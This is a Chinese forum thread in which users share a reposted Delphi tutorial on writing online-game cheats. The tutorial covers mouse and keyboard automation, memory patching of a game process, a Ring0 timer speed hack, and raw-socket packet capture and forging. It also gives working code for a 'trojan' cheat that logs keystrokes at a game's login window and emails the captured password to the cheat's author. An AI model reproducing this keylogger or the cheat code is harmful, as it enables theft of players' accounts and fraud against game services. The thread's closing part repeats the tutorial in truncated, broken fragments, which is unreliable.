发送了上面的封包后，我们根据新增NPC代码构造封包马上发给客户端，格式就是"F4 44 12 E9 NPC代码 02 00 00 03 00 00 00 00 00 00",把每个新增的NPC都构造这样一个包，按顺序连在一起发送给客户端，客户端也就被我们骗过了，很简单吧。 以后战斗中其他的事我们就不管了，尽情地开打吧，呵呵。 来自: weiliu, 时间: 2005-01-19 14:04:15, ID: 2970061   Delphi深度之旅——网络游戏外挂制作 日期：2004年8月6日作者：昆明　刘悦人气：3857 查看:[大字体中字体小字体]   企商在线老牌虚拟主机商购主机送鼠标送U盘送30G移动硬盘！ 在几年前我看到别人玩网络游戏用上了外挂，做为程序员的我心里实在是不爽，想搞清楚这到底是怎么回事。就拿了一些来研究，小有心得，拿出来与大家共享，外挂无非就是分几种罢了（依制作难度）： 1、动作式，所谓动作式，就是指用API发命令给窗口或API控制鼠标、键盘等，使游戏里的人物进行流动或者攻击，最早以前的“石器”外挂就是这种方式。 2、本地修改式，这种外挂跟传统上的一些游戏修改器没有两样，做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现，“精灵”的外挂这是这种方式写成的，它的难点在于找到那些地址码，找地址一般地要借助于别人的工具，有的游戏还有双码校验，正正找起来会比较困难。 3、木马式，这种外挂的目的是帮外挂制作者偷到用户的密码，做这种外挂有一定的难度，需要HOOK或键盘监视技术做底子，才可以完成，它的原理是先首截了用户的帐号或密码，然后发到指定邮箱。 4、加速式，这种外挂可以加快游戏的速度。原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。 5、封包式，这种外挂是高难度外挂，需要有很强的编程功力才可以写得出来。它的原理是先截取封包，后修改，再转发。这种外挂适用于大多数网络游戏，像WPE及一些网络游戏外挂都是用这种方式写成的，编写这种外挂需要apihook技术，winsock2技术………… 　以下就用Delphi实现网络游戏外挂。 =================================================================================== 上回对五种类型的外挂做了一个大体的概括，大家对这几种外挂都有了一定的了解，现在就依次（制作难度）由浅到深谈谈我对外挂制作的一些认识吧~~~~ 首先，先来谈一下动作式的外挂，这也是我第一次写外挂时做的最简单的一种。 记得还在“石器”时代的时候，我看到别人挂着一种软件（外挂）人物就可以四外游走（当时我还不知道外挂怎么回事^_^），于是找了这种软件过来研究（拿来后才听别人说这叫外挂），发现这种东东其实实现起来并不难，仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已，看后就有实现这功能的冲动，随后跑到MSDN上看了一些资料，发现这种实现这几个功能，只需要几个简单的API函数就可以搞定： 1、首先我们要知道现在鼠标的位置（为了好还原现在鼠标的位置）所以我们就要用到API函数GetCursorPos，它的使用方法如下： BOOL GetCursorPos( LPPOINT lpPoint // address of structure for cursor position ); 2、我们把鼠标的位置移到要到人物走到的地方，我们就要用到SetCursorPos函数来移动鼠标位置，它的使用方法如下： BOOL SetCursorPos( int X, // horizontal position int Y // vertical position ); 3、模拟鼠标发出按下和放开的动作，我们要用到mouse_event函数来实现，具休使用方法用下： VOID mouse_event( DWORD dwFlags, // flags specifying various motion/click variants DWORD dx, // horizontal mouse position or position change DWORD dy, // vertical mouse position or position change DWORD dwData, // amount of wheel movement DWORD dwExtraInfo // 32 bits of application-defined information ); 在它的dwFlags处，可用的事件很多如移动MOUSEEVENTF_MOVE，左键按下MOUSEEVENTF_LEFTDOWN，左键放开MOUSEEVENTF_LEFTUP，具体的东东还是查一下MSDN吧~~~~~ 好了，有了以前的知识，我们就可以来看看人物移走是怎么实现的了： getcursorpos(point); setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数 mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0); mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0); setcursorpos(point.x,point.y); 看了以上的代码，是不是觉得人物的游走很简单啦~~，举一仿三，还有好多好东东可以用这个技巧实现（我早就说过，TMD，这是垃圾外挂的做法，相信了吧~~~），接下来，再看看游戏里面自动攻击的做法吧（必需游戏中攻击支持快捷键的），道理还是一样的，只是用的API不同罢了~~~，这回我们要用到的是keybd_event函数，其用法如下： VOID keybd_event( BYTE bVk, // virtual-key code BYTE bScan, // hardware scan code DWORD dwFlags, // flags specifying various function options DWORD dwExtraInfo // additional data associated with keystroke ); 我们还要知道扫描码不可以直接使用，要用函数MapVirtualKey把键值转成扫描码，MapVirtualKey的具体使用方法如下： UINT MapVirtualKey( UINT uCode, // virtual-key code or scan code UINT uMapType // translation to perform ); 好了，比说此快接键是CTRL+A，接下来让我们看看实际代码是怎么写的： keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0); keybd_event(65,mapvirtualkey(65,0),0,0); keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0); keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0); 首先模拟按下了CTRL键，再模拟按下A键，再模拟放开A键，最后放开CTRL键，这就是一个模拟按快捷键的周期。 （看到这里，差不多对简易外挂有了一定的了解了吧~~~~做一个试试？如果你举一仿三还能有更好的东东出来，这就要看你的领悟能力了~~，不过不要高兴太早这只是才开始，以后还有更复杂的东东等着你呢~~） =============================================================== 上回我们对动作式外挂做了一个解析，动作式是最简单的外挂，现在我们带来看看，比动作式外挂更进一步的外挂——本地修改式外挂的整个制作过程进行一个详细的分解。 具我所知，本地修改式外挂最典型的应用就是在“精灵”游戏上面，因为我在近一年前（“精灵”还在测试阶段），我所在的公司里有很多同事玩“精灵”，于是我看了一下游戏的数据处理方式，发现它所发送到服务器上的信息是存在于内存当中（我看后第一个感受是：修改这种游戏和修改单机版的游戏没有多大分别，换句话说就是在他向服务器提交信息之前修改了内存地址就可以了），当时我找到了地址于是修改了内存地址，果然，按我的想法修改了地址，让系统自动提交后，果然成功了~~~~~，后来“精灵”又改成了双地址校检，内存校检等等，在这里我就不废话了~~~~，OK，我们就来看看这类外挂是如何制作的： 在做外挂之前我们要对Windows的内存有个具体的认识，而在这里我们所指的内存是指系统的内存偏移量，也就是相对内存，而我们所要对其进行修改，那么我们要对几个Windows API进行了解，OK，跟着例子让我们看清楚这种外挂的制作和API的应用（为了保证网络游戏的正常运行，我就不把找内存地址的方法详细解说了）： 1、首先我们要用FindWindow,知道游戏窗口的句柄，因为我们要通过它来得知游戏的运行后所在进程的ID，下面就是FindWindow的用法： HWND FindWindow( LPCTSTR lpClassName, // pointer to class name LPCTSTR lpWindowName // pointer to window name ); 2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID，函数用法如下： DWORD GetWindowThreadProcessId( HWND hWnd, // handle of window LPDWORD lpdwProcessId // address of variable for process identifier ); 3、得到游戏进程ID后，接下来的事是要以最高权限打开进程，所用到的函数OpenProcess的具体使用方法如下： HANDLE OpenProcess( DWORD dwDesiredAccess, // access flag BOOL bInheritHandle, // handle inheritance flag DWORD dwProcessId // process identifier ); 在dwDesiredAccess之处就是设存取方式的地方，它可设的权限很多，我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以，其他的方式我们可以查一下MSDN。 4、打开进程后，我们就可以用函数对存内进行操作，在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可（其他的操作方式比如说：ReadProcessMemory等，我在这里就不一一介绍了），我们看一下WriteProcessMemory的用法： BOOL WriteProcessMemory( HANDLE hProcess, // handle to process whose memory is written to LPVOID lpBaseAddress, // address to start writing to LPVOID lpBuffer, // pointer to buffer to write data to DWORD nSize, // number of bytes to write LPDWORD lpNumberOfBytesWritten // actual number of bytes written ); 5、下面用CloseHandle关闭进程句柄就完成了。 这就是这类游戏外挂的程序实现部份的方法，好了，有了此方法，我们就有了理性的认识，我们看看实际例子，提升一下我们的感性认识吧，下面就是XX游戏的外挂代码，我们照上面的方法对应去研究一下吧： const ResourceOffset: dword = $004219F4; resource: dword = 3113226621; ResourceOffset1: dword = $004219F8; resource1: dword = 1940000000; ResourceOffset2: dword = $0043FA50; resource2: dword = 1280185; ResourceOffset3: dword = $0043FA54; resource3: dword = 3163064576; ResourceOffset4: dword = $0043FA58; resource4: dword = 2298478592; var hw: HWND; pid: dword; h: THandle; tt: Cardinal; begin hw := FindWindow('XX', nil); if hw = 0 then Exit; GetWindowThreadProcessId(hw, @pid); h := OpenProcess(PROCESS_ALL_ACCESS, false, pid); if h = 0 then Exit; if flatcheckbox1.Checked=true then begin WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt); WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt); end; if flatcheckbox2.Checked=true then begin WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt); WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt); WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt); end; MessageBeep(0); CloseHandle(h); close; 这个游戏是用了多地址对所要提交的数据进行了校验，所以说这类游戏外挂制作并不是很难，最难的是要找到这些地址。 ================================================================ 以前介绍过的动作式，本地修改式外挂是真正意义上的外挂，而今天本文要介绍的木马式外挂，可能大多像木马吧，是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在，所以今天不得不说一下（我个人是非常讨厌这类外挂的，请看过本文的朋友不要到处乱用此技术，谢谢合作）。要做此类外挂的程序实现方法很多（比如HOOK，键盘监视等技术），因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库，所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视，这个程序用这种技术来实现比较适合。 在做程序之前我们必需要了解一下程序的思路： 1、我们首先知道你想记录游戏的登录窗口名称。 2、判断登录窗口是否出现。 3、如果登录窗口出现，就记录键盘。 4、当窗口关闭时，把记录信息，通过邮件发送到程序设计者的邮箱。 第一点我就不具体分析了，因为你们比我还要了解你们玩的是什么游戏，登录窗口名称是什么。从第二点开始，我们就开始这类外挂的程序实现之旅： 那么我们要怎么样判断登录窗口虽否出现呢？其实这个很简单，我们用FindWindow函数就可以很轻松的实现了： HWND FindWindow( LPCTSTR lpClassName, // pointer to class name LPCTSTR lpWindowName // pointer to window name ); 实际程序实现中，我们要找到'xx'窗口，就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现，那么我们就可以对键盘信息进行记录了。 先首我们用SetWindowsHookEx设置监视日志，而该函数的用法如下： HHOOK SetWindowsHookEx( int idHook, // type of hook to install HOOKPROC lpfn, // address of hook procedure HINSTANCE hMod, // handle of application instance DWORD dwThreadId // identity of thread to install hook for ); 在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数，来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了，具体实现方法为： hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0); 而HOOKPROC里的函数就要复杂一点点： function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then //如果发现窗口后 begin if (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等于键盘按下 hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通过keyhookresult（自定义的函数，主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的）转换消息。 if length(hookkey) > 0 then //如果获得按键名称 begin Write(hookkeyFile,hookkey); //把按键名称写入文本文件 hookkey := ''; end; end; end; 以上就是记录键盘的整个过程，简单吧，如果记录完可不要忘记释放呀，UnHookWindowsHookEx(hHook)，而hHOOK,就是创建setwindowshookex后所返回的句柄。 我们已经得到了键盘的记录，那么现在最后只要把记录的这些信息发送回来，我们就大功造成了。其他发送这块并不是很难，只要把记录从文本文件里边读出来，用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下： assignfile(ReadFile,'hook.txt'); //打开hook.txt这个文本文件 reset(ReadFile); //设为读取方式 try While not Eof(ReadFile) do //当没有读到文件尾 begin Readln(ReadFile,s,j); //读取文件行 body:=body+s; end; finally closefile(ReadFile); //关闭文件 end; nmsmtp1.EncodeType:=uuMime; //设置编码 nmsmtp1.PostMessage.Attachments.Text:=''; //设置附件 nmsmtp1.PostMessage.FromAddress:='XXX@XXX.com'; //设置源邮件地址 nmsmtp1.PostMessage.ToAddress.Text:='XXX@XXX.com'; /设置目标邮件地址 nmsmtp1.PostMessage.Body.Text:='密码'+' '+body; //设置邮件内容 nmsmtp1.PostMessage.Subject:='password'; //设置邮件标题 nmsmtp1.SendMail; //发送邮件 ================================================================================== 我一直没有搞懂制作加速外挂是怎么一回事，直到前不久又翻出来了2001年下半期的《程序员合订本》中《“变速齿轮”研究手记》重新回味了一遍，才有了一点点开悟，随后用Delphi重写了一遍，下面我就把我的心得说给大家听听，并且在此感谢《“变速齿轮”研究手记》作者褚瑞大虲给了提示。废话我就不多说了，那就开始神奇的加速型外挂体验之旅吧！ 原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。 以前DOS时代玩过编程的人就会马上想到，这很简单嘛不就是直接修改一下8253寄存器嘛，这在以前DOS时代可能可以行得通，但是windows则不然。windows是一个32位的操作系统，并不是你想改哪就改哪的（微软的东东就是如此霸气，说不给你改就不给你改^_^），但要改也不是不可能，我们可以通过两种方法来实现：第一是写一个硬件驱动来完成，第二是用Ring0来实现（这种方法是CIH的作者陈盈豪首用的，它的原理是修改一下IDT表->创建一个中断门->进入Ring0->调用中断修改向量，但是没有办法只能用ASM汇编来实现这一切*_*，做为高级语言使用者惨啦！），用第一种方法用点麻烦，所以我们在这里就用第二种方法实现吧~~~ 在实现之前我们来理一下思路吧： 1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门，修改向量等工作 2、调用这个过程来实现加速功能 好了，现在思路有了，我们就边看代码边讲解吧： 首先我们建立一个过程，这个过程就是本程序的核心部份： procedure SetRing(value:word); stdcall; const ZDH = $03; ／／设一个中断号 var IDT : array [0..5] of byte; ／／保存IDT表 OG : dword; ／／存放旧向量 begin asm push ebx sidt IDT ／／读入中断描述符表 mov ebx, dword ptr [IDT+2] ／／IDT表基地址 add ebx, 8*ZDH ／／计算中断在中断描述符表中的位置 cli ／／关中断 mov dx, word ptr [ebx+6] shl edx, 16d mov dx, word ptr [ebx] mov [OG], edx mov eax, offset @@Ring0 ／／指向Ring0级代码段 mov word ptr [ebx], ax ／／低16位,保存在1,2位 shr eax, 16d mov word ptr [ebx+6], ax ／／高16位，保存在6,7位 int ZDH ／／中断 mov ebx, dword ptr [IDT+2] ／／重新定位 add ebx, 8*ZDH mov edx, [OG] mov word ptr [ebx], dx shr edx, 16d mov word ptr [ebx+6], dx ／／恢复被改了的向量 pop ebx jmp @@exitasm ／／到exitasm处 @@Ring0: ／／Ring0,这个也是最最最核心的东东 mov al,$34 ／／写入8253控制寄存器 out $43,al mov ax,value　／／写入定时值 out $40,al ／／写定时值低位 mov al,ah out $40,al ／／写定时值高位 iretd ／／返回 @@exitasm: end; end; 最核心的东西已经写完了，大部份读者是知其然不知其所以然吧，呵呵，不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧！ 先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上： SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160))); 因为windows默认的值为$1742，所以我们把1742做为基数，又因为值越小越快，反之越慢的原理，所以写了这样一个公式，好了，这就是“变速齿轮”的一个Delphi＋ASM版了（只适用于win9X），呵呵，试一下吧，这对你帮助会很大的，呵呵。 在win2000里，我们不可能实现在直接对端口进行操作，Ring0也失了效，有的人就会想到，我们可以写驱动程序来完成呀，但在这里我告诉你，windows2000的驱动不是一个VxD就能实现的，像我这样的低手是写不出windows所用的驱动WDM的，没办法，我只有借助外力实现了，ProtTalk就是一个很好的设备驱动，他很方便的来实现对低层端口的操作，从而实现加速外挂。 1、我们首先要下一个PortTalk驱动，他的官方网站是http://www.beyondlogic.org 2、我们要把里面的prottalk.sys拷贝出来。 3、建立一个Protalk.sys的接口（我想省略了，大家可以上http://www.freewebs.com/liuyue/porttalk.pas下个pas文件自己看吧） 4、实现加速外挂。 本来就篇就是补充篇原理我也不想讲太多了，下面就讲一下这程序的实现方法吧，如果说用ProtTalk来操作端口就容易多了，比win98下用ring权限操作方便。 1、新建一个工程，把刚刚下的接口文件和Protalk.sys一起拷到工程文件保存的文件夹下。 2、我们在我们新建的工程加入我们的接口文件 uses windows,ProtTalk…… 3、我们建立一个过程 procedure SetRing(value:word); begin if not OpenPortTalk then exit; outportb($43,$34); outportb($40,lo(Value)); outprotb($40,hi(value)); ClosePortTalk; end; 4、先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上： SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160))); ============================================================================ 网络游戏的封包技术是大多数编程爱好者都比较关注的关注的问题之一，在这一篇里就让我们一起研究一下这一个问题吧。 别看这是封包这一问题，但是涉及的技术范围很广范，实现的方式也很多（比如说APIHOOK,VXD,Winsock2都可以实现），在这里我们不可能每种技术和方法都涉及，所以我在这里以Winsock2技术作详细讲解，就算作抛砖引玉。 由于大多数读者对封包类编程不是很了解，我在这里就简单介绍一下相关知识： APIHooK： 由于Windows的把内核提供的功能都封装到API里面，所以大家要实现功能就必须通过API，换句话说就是我们要想捕获数据封包，就必须先要得知道并且捕获这个API，从API里面得到封包信息。 VXD： 直接通过控制VXD驱动程序来实现封包信息的捕获，不过VXD只能用于win9X。 winsock2： winsock是Windows网络编程接口，winsock工作在应用层，它提供与底层传输协议无关的高层数据传输编程接口，winsock2是winsock2.0提供的服务提供者接口，但只能在win2000下用。 好了，我们开始进入winsock2封包式编程吧。 在封包编程里面我准备分两个步骤对大家进行讲解：1、封包的捕获，2、封包的发送。 首先我们要实现的是封包的捕获： Delphi的封装的winsock是1.0版的，很自然winsock2就用不成。如果要使用winsock2我们要对winsock2在Delphi里面做一个接口，才可以使用winsock2。 1、如何做winsock2的接口？ 1）我们要先定义winsock2.0所用得到的类型，在这里我们以WSA_DATA类型做示范，大家可以举一仿三的来实现winsock2其他类型的封装。 我们要知道WSA_DATA类型会被用于WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer;，大家会发现WSData是引用参数，在传入参数时传的是变量的地址，所以我们对WSA_DATA做以下封装： const WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; type PWSA_DATA = ^TWSA_DATA; WSA_DATA = record wVersion: Word; wHighVersion: Word; szDescription: array[0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; TWSA_DATA = WSA_DATA; 2）我们要从WS2_32.DLL引入winsock2的函数，在此我们也是以WSAStartup为例做函数引入： function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; implementation const WinSocket2 = 'WS2_32.DLL'; function WSAStartup; external winsocket name 'WSAStartup'; 通过以上方法，我们便可以对winsock2做接口，下面我们就可以用winsock2做封包捕获了，不过首先要有一块网卡。因为涉及到正在运作的网络游戏安全问题，所以我们在这里以IP数据包为例做封包捕获，如果下面的某些数据类型您不是很清楚，请您查阅MSDN： 1）我们要起动WSA，这时个要用到的WSAStartup函数，用法如下： INTEGER WSAStartup( wVersionRequired: word， WSData: TWSA_DATA )； 2）使用socket函数得到socket句柄，m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); 用法如下： INTEGER socket(af: Integer, Struct: Integer, protocol: Integer ); m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP);在程序里m_hSocket为socket句柄，AF_INET，SOCK_RAW，IPPROTO_IP均为常量。 3)定义SOCK_ADDR类型，跟据我们的网卡IP给Sock_ADDR类型附值，然后我们使用bind函数来绑定我们的网卡，Bind函数用法如下： Type IN_ADDR = record S_addr : PChar; End; Type TSOCK_ADDR = record sin_family: Word; sin_port: Word; sin_addr : IN_ADDR sin_zero: array[0..7] of Char; End; var LocalAddr:TSOCK_ADDR; LocalAddr.sin_family: = AF_INET; LocalAddr.sin_port: = 0; LocalAddr.sin_addr.S_addr: = inet_addr('192.168.1.1'); ／／这里你自己的网卡的IP地址,而inet_addr这个函数是winsock2的函数。 bind(m_hSocket, LocalAddr, sizeof(LocalAddr))； 4)用WSAIoctl来注册WSA的输入输出组件，其用法如下： INTEGER WSAIoctl(s:INTEGER, dwIoControlCode : INTEGER, lpvInBuffer :INTEGER, cbInBuffer : INTEGER, lpvOutBuffer : INTEGER, cbOutBuffer: INTEGER, lpcbBytesReturned : INTEGER, lpOverlapped : INTEGER, lpCompletionRoutine : INTEGER ); 5)下面做死循环，在死循环块里，来实现数据的接收。但是徇环中间要用Sleep()做延时，不然程序会出错。 6)在循环块里，用recv函数来接收数据，recv函数用法如下： INTEGER recv (s : INTEGER, buffer:Array[0..4095] of byte, length : INTEGER, flags : INTEGER, )； 7)在buffer里就是我们接收回来的数据了，如果我们想要知道数据是什么地方发来的，那么，我们要定义一定IP包结构，用CopyMemory()把IP信息从buffer里面读出来就可以了，不过读出来的是十六进制的数据需要转换一下。 看了封包捕获的全过程序，对你是不是有点起发，然而在这里要告诉大家的是封包的获得是很容易的，但是许多游戏的封包都是加密的，如果你想搞清楚所得到的是什么内容还需要自己进行封包解密。 ====================================================================== 在本章中，我们主要来研究一下封包的制作和发送，同样，我们所采用的方法是Delphi+winsock2来制作。在以前说过在Delphi中只封装了winsock1，winsock2需要自已封装一下，我在此就不多介绍如何封装了。 下面就一步步实现我们的封包封装与发送吧： 首先，我们应该知道，封包是分两段的，一段是IP，一段是协议（TCP，UDP，其他协议），IP就像邮政编码一样，标识着你的这个封包是从哪里到哪里，而协议里记录着目标所要用到的包的格式及校验等，在网络游戏中的协议一般都是自已定义的，要破解网络游戏最重要的是学会破解网络游戏的协议网络游戏协议破解，为了不影响现运行的网络游戏的安全，我在此会以UDP协议为例，介绍一下网络协议的封包与发送的全过程。 接下来，我们就可以开始看看整个封包全过程了： 1）我们要起动sock2，这时个要用到的WSAStartup函数，用法如下： INTEGER WSAStartup( wVersionRequired: word， WSData: TWSA_DATA )； 在程序中wVersionRequired我们传入的值为$0002,WSData为TWSA_DATA的结构。 2）使用socket函数创建并得到socket句柄; 用法如下： INTEGER socket(af: Integer, Struct: Integer, protocol: Integer ); 注意的是在我们的程序封包中饱含了IP包头，所以我们的Struct参数这里要传入的参数值为2，表示包含了包头。该函数返回值为刚刚创建的winsocket的句柄。 3）使用setsockopt函数设置sock的选项; 用法如下： INTEGER setsockopt(s: Integer, level: Integer, optname: Integer, optval: PChar, optlen: Integer ); 在S处传入的是Socket句柄，在本程序里level输入的值为0表示IP（如果是6表示TCP，17表示UDP等~），OptName里写入2，而optval的初始值填入1，optlen为optval的大小。 4）接下来我们要分几个步骤来实现构建封包： 1、把IP转换成sock地址，用inet_addr来转换。 Longint inet_addr( cp: PChar ); 2、定义包的总大小、IP的版本信息为IP结构： 总包大小=IP头的大小+UDP头的大小+UDP消息的大小， IP的版本，在此程序里定义为4， 3、填写IP包头的结构： ip.ipverlen := IP的版本 shl 4; ip.iptos := 0; // IP服务类型 ip.iptotallength := ; // 总包大小 ip.ipid := 0; // 唯一标识，一般设置为0 ip.ipoffset := 0; // 偏移字段 ip.ipttl := 128; // 超时时间 ip.ipprotocol := $11; // 定义协议 ip.ipchecksum := 0 ; // 检验总数 ip.ipsrcaddr := ; // 源地址 ip.ipdestaddr := ; // 目标地址 4、填写UDP包头的结构： udp.srcportno := ; //源端口号 udp.dstportno := ; //目标端口号 udp.udplength := ; //UDP包的大小 udp.udpchecksum := ; //检验总数 5、把IP包头，UDP包头及消息，放入缓存。 6、定义远程信息： remote.family := 2; remote.port :=; //远程端口 remote.addr.addr :=; //远程地址 5）我们用SendTo发送封包，用法如下： INTEGER sendto(s: Integer, var Buf: Integer, var len: Integer, var flags: Integer, var addrto: TSock_Addr; tolen: Integer ); 在S处传入的是Socket句柄,Buf是刚刚建好的封包，len传入封包的总长度刚刚计算过了，flag是传入标记在这里我们设为0，addto发送到的目标地址，在这里我们就传入remote就可以了，tolen写入的是remote的大小。 6）到了最后别忘记了用CloseSocket(sh)关了socket和用WSACleanup关了winsock。 最后要说的是这种发送方式，只能发送完全被破解的网络协议，如果要在别人的程序中间发送数据就只有用APIHOOK或在winsock2做中间层了。如果大家还有什么问题需要和我讨论，请发邮件到microprogramer@hotmail.com或加QQ：24259132。   来自: weiliu, 时间: 2005-01-19 14:06:17, ID: 2970065   http://www.51ku.net/info/209.htm 也有连续几篇关于外挂的文章。 来自: missinwind, 时间: 2005-01-19 14:27:44, ID: 2970092   没接触过这类问题，不过帮顶一下！ 来自: S3D4, 时间: 2005-01-20 9:04:48, ID: 2970736   抱歉几天出差没来了，weiliu发的文章讲的多是真正意义上针对特定游戏的外挂，我想实现 的是一种通用的，可以在任意DirectX、OpenGL环境使用的，我就想在屏幕上划个不透明的 十字而已，OnTop的窗口好像是不行的。有没有其他的什么技术，比如Hook DirectX的API之 类的 问题讨论没有结束 ...

eire · 2006-07-25

谢谢WEILIU的资料，但如何得到游戏中某特征的内存地址，还是不清楚。[

]

weiliu · 2006-07-25

问题: 讨论，谁知道游戏外挂的写法？？？ ( 积分: 100 )   分类: 系统相关   来自: lukisy, 时间: 2003-11-11 15:57:00, ID: 2286864   现在游戏外挂满天飞，几乎所有的游戏都有外挂 谁知道其具体写法请赐教。 谢谢 来自: liwens, 时间: 2003-11-11 18:44:00, ID: 2287351   到这里DOWN一个外挂教程学习学习吧！ http://www.cnse8.com/showsoft.asp?soft_id=481 来自: lgxyy, 时间: 2003-11-11 18:45:00, ID: 2287358   源码空间上有一个 来自: lukisy, 时间: 2003-11-16 20:33:00, ID: 2298034   不灵啊,有写过的吗? 请指点. 谢谢 来自: lukisy, 时间: 2003-11-22 16:34:00, ID: 2310475   没人写过吗？ 自己支持一下了 来自: 开心人, 时间: 2003-11-22 17:07:00, ID: 2310507   外挂源码，要买么？ 来自: lukisy, 时间: 2003-11-23 11:49:00, ID: 2311347   不买，就想学习学习。 能给点思路，或者别的什么吗？ 谢谢。 如果买要多少？？ 是什么游戏的外挂？ 来自: book523, 时间: 2003-11-23 12:19:00, ID: 2311404   转贴一文： 作者?: 微程标题?: Delphi深度之旅——网络游戏外挂制作关键字: 外挂,API,Delphi,游戏分类?: 开发经验密级?: 参赛 (评分:★★★★★ , 回复: 31, 阅读: 3801) »» 昆明　刘悦　在几年前我看到别人玩网络游戏用上了外挂，做为程序员的我心里实在是不爽，想搞清楚这到底是怎么回事。就拿了一些来研究，小有心得，拿出来与大家共享，外挂无非就是分几种罢了（依制作难度）：1、动作式，所谓动作式，就是指用API发命令给窗口或API控制鼠标、键盘等，使游戏里的人物进行流动或者攻击，最早以前的“石器”外挂就是这种方式。2、本地修改式，这种外挂跟传统上的一些游戏修改器没有两样，做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现，“精灵”的外挂这是这种方式写成的，它的难点在于找到那些地址码，找地址一般地要借助于别人的工具，有的游戏还有双码校验，正正找起来会比较困难。3、木马式，这种外挂的目的是帮外挂制作者偷到用户的密码，做这种外挂有一定的难度，需要HOOK或键盘监视技术做底子，才可以完成，它的原理是先首截了用户的帐号或密码，然后发到指定邮箱。4、加速式，这种外挂可以加快游戏的速度。原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。5、封包式，这种外挂是高难度外挂，需要有很强的编程功力才可以写得出来。它的原理是先截取封包，后修改，再转发。这种外挂适用于大多数网络游戏，像WPE及一些网络游戏外挂都是用这种方式写成的，编写这种外挂需要apihook技术，winsock2技术…………　以下就用Delphi实现网络游戏外挂。 2003-5-15 10:35:00     发表评语»»»     2003-5-15 10:35:23    上回对五种类型的外挂做了一个大体的概括，大家对这几种外挂都有了一定的了解，现在就依次（制作难度）由浅到深谈谈我对外挂制作的一些认识吧~~~~首先，先来谈一下动作式的外挂，这也是我第一次写外挂时做的最简单的一种。记得还在“石器”时代的时候，我看到别人挂着一种软件（外挂）人物就可以四外游走（当时我还不知道外挂怎么回事^_^），于是找了这种软件过来研究（拿来后才听别人说这叫外挂），发现这种东东其实实现起来并不难，仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已，看后就有实现这功能的冲动，随后跑到MSDN上看了一些资料，发现这种实现这几个功能，只需要几个简单的API函数就可以搞定：1、首先我们要知道现在鼠标的位置（为了好还原现在鼠标的位置）所以我们就要用到API函数GetCursorPos，它的使用方法如下：BOOL GetCursorPos(   LPPOINT lpPoint  // address of structure for cursor position   &nbsp

;2、我们把鼠标的位置移到要到人物走到的地方，我们就要用到SetCursorPos函数来移动鼠标位置，它的使用方法如下：BOOL SetCursorPos(   int X, // horizontal position     int Y  // vertical position &nbsp

;3、模拟鼠标发出按下和放开的动作，我们要用到mouse_event函数来实现，具休使用方法用下：VOID mouse_event(   DWORD dwFlags, // flags specifying various motion/click variants   DWORD dx, // horizontal mouse position or position change   DWORD dy, // vertical mouse position or position change   DWORD dwData, // amount of wheel movement   DWORD dwExtraInfo  // 32 bits of application-defined information &nbsp

